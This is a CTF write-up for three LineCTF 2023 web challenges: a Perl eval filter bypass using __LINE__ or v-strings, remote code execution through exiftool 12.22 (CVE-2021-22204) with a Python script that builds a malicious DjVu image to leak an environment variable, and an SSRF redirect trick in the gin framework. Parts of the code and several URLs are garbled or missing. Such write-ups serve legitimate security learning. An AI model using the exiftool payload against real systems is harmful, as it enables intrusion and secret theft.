LineCTF 2023 - web (partial)
to be continued…
Old Pal
Just an appetizer.
Input a password to make the expression eval to true and pass filters.
my $q = CGI->new;
print "Content-Type: text/html\n\n";
my $pw = uri_unescape(scalar $q->param("password"));
if (eval("$pw == 20230325")) {
print "Congrats! Flag is LINECTF{redacted}"
} else {
print "wrong password :(";
- no longer then 20
- only letters, digits, underscore (
), dash (-
) - at least one letter, one digit, one of
- no hex, oct, bin, and scientifical notation
if (length($pw) >= 20) {
print "Too long :(";
if ($pw =~ /[^0-9a-zA-Z_-]/) {
print "Illegal character :(";
if ($pw !~ /[0-9]/ || $pw !~ /[a-zA-Z]/ || $pw !~ /[_-]/) {
print "Weak password :(";
if ($pw =~ /[0-9_-][boxe]/i) {
print "Do not punch me :(";
And no code injection (highly impossible and the related code is omitted here).
And a vague restriction.
if ($pw =~ /[Mx. squ1ffy]/i) {
print "You may have had one too many Old Pal :(";
An easy thinking is to find some expression eval to 20230325. And an intuitive construction is 20230326-xxx
, where xxx
is something interesting.
In fact, there are some special builtin functions in perl. The one we need is __LINE__
, which returns the current line number. In the eval context in this challenge, it will return 1.
Hence, the final exp is:
$ curl ''
Congrats! Flag is LINECTF{3e05d493c941cfe0dd81b70dbf2d972b}
Another choice is to using the v-string in Perl:
A literal of the form v1.20.300.4000 is parsed as a string composed of characters with the specified ordinals. This form is known as v-strings.
A v-string provides an alternative and more readable way to construct strings, rather than use the somewhat less readable interpolation form “\x{1}\x{14}\x{12c}\x{fa0}”.
So just use v48
to represent 0:
$ curl ''
Congrats! Flag is LINECTF{3e05d493c941cfe0dd81b70dbf2d972b}
First, from the dockerfile can we know the version of exiftool used in this challenge is 12.22, which is vulnerable (CVE-2021-22204) and may lead to RCE.
RUN wget && \
tar xvf 12.22.tar.gz && \
cp -fr /exiftool-12.22/* /usr/bin && \
rm -rf /exiftool-12.22 && \
rm 12.22.tar.gz
There are many exploits or analysis articles on the network. Just choose any.
Here we choose this one.
A problem is that the python backend is run in an internal network and has no access to public network, that is, we cannot establish a reverse shell, which would be the first choice to get the flag.
Though there are still many approaches to get flag, here we use a small trick to do this “elegantly”.
From the exploiting script we can notice that the vulnerability is code injection rather than command execution in fact, and RCE is achieved by invoking system
Hence we have the capability to execute perl code in an “eval” context.
#!/usr/bin/env python3
import base64
import subprocess
code = 'perl code here'
payload = b"(metadata \"\c${use MIME::Base64;eval(decode_base64('"
payload = payload + base64.b64encode( code.encode() )
payload = payload + b"'))};\")"
payload_file = open('payload', 'w')
payload_file.close()['bzz', 'payload', 'payload.bzz'])['djvumake', 'exploit.djvu', "INFO=1,1", 'BGjp=/dev/null', 'ANTz=payload.bzz'])['exiftool', '-config', 'configfile', '-HasselbladExif<=exploit.djvu', 'image.jpg'])
If we inject some mess code that would throw a warning, for example, use code = '$a=$a+1'
and upload the malicious image, the web page will produce following output of exif info:
SourceFile: tmp/ac76c800-c203-4813-94ca-934b7bc8da1b
ExifTool:ExifToolVersion: 12.22
ExifTool:Warning: RawConv HasselbladExif: Use of uninitialized value $Image::ExifTool::DjVu::a in addition (+)
File:FileName: ac76c800-c203-4813-94ca-934b7bc8da1b
Note that the warning message is printed as an entry of exif info!
Then things go easy. Just use the builtin warn
function to print the flag as a warning message. Since the flag is stored as an environment variable, the payload is just use Env; warn $FLAG;
And then the flag will be shown on the web page.
SourceFile: tmp/9ce3c18c-3301-49a9-822d-9f6789171553
ExifTool:ExifToolVersion: 12.22
ExifTool:Warning: RawConv HasselbladExif: LINECTF{2a38211e3b4da95326f5ab593d0af0e9}
File:FileName: 9ce3c18c-3301-49a9-822d-9f6789171553
Adult Simple GoCurl
The server serves three api:
, just index.html/curl/
, a SSRF service/flag/
, return flag but only for RemoteAddr127.0.0.1
, which cannot be forged.
The main thinking is to access /flag/
through /curl/
, but there are some restriction for the url
query parameter:
if strings.Contains(reqUrl, "flag")
|| strings.Contains(reqUrl, "curl")
|| strings.Contains(reqUrl, "%") {
c.JSON(http.StatusBadRequest, gin.H{"message": "Something wrong 1"})
Keyword flag
and curl
are filtered. A direct counter is using redirection. However, the server only accept redirections from
by adding a redirection checker to the http client.
func redirectChecker(req *http.Request, via []*http.Request) error {
reqIp := strings.Split(via[len(via)-1].Host, ":")[0]
if len(via) >= 2 || reqIp != "" {
log.Println("not redirect from")
return errors.New("something wrong")
return nil
One may attempt to forge the Host
header by passing header_key=Host&header_value=
as the query parameter of the /curl/
api since it offers such a chance to set a header. But this won’t work because the Host
header is not set from the req.Header
. Instead, it is set according to the url to request.
The only possibility to solve this challenge is to leverage the redirects sent by the server itself. But there is no explict redirection in the source code (main.go
If one have mistyped the request path /curl/
as /curl
, he may find the server response a 301 rather than a 404:
$ curl '' -v
* Trying
* Connected to ( port 11001 (#0)
> GET /curl HTTP/1.1
> Host:
> User-Agent: curl/7.81.0
> Accept: */*
* Mark bundle as not supporting multiuse
< HTTP/1.1 301 Moved Permanently
< Content-Type: text/html; charset=utf-8
< Location: /curl/
< Date: Mon, 27 Mar 2023 08:05:18 GMT
< Content-Length: 41
<a href="/curl/">Moved Permanently</a>.
* Connection #0 to host left intact
This gives us the clue. The gin framework may have some features about url correction using redirection, which can be leveraged.
Look up the source code the gin framework, we find such a snippet in function gin.go/handleHTTPRequest
if httpMethod != http.MethodConnect && rPath != "/" {
if value.tsr && engine.RedirectTrailingSlash {
if engine.RedirectFixedPath && redirectFixedPath(c, root, engine.RedirectFixedPath) {
In the definition of the function redirectTrailingSlash
, a header named X-Forwarded-Prefix
is checked. Obviously that’s what we want.
func redirectTrailingSlash(c *Context) {
req := c.Request
p := req.URL.Path
if prefix := path.Clean(c.Request.Header.Get("X-Forwarded-Prefix")); prefix != "." {
prefix = regSafePrefix.ReplaceAllString(prefix, "")
prefix = regRemoveRepeatedChar.ReplaceAllString(prefix, "/")
p = prefix + "/" + req.URL.Path
req.URL.Path = p + "/"
if length := len(p); length > 1 && p[length-1] == '/' {
req.URL.Path = p[:length-1]
The remaining thing is simple, finding a path that will be redirected to /
and set the header X-Forwarded-Prefix
to /flag/
. The final exp:
$ curl ''
{"body":"{\"message\":\"= LINECTF{b80233bef0ecfa0741f0d91269e203d4}\"}","status":"200 OK"}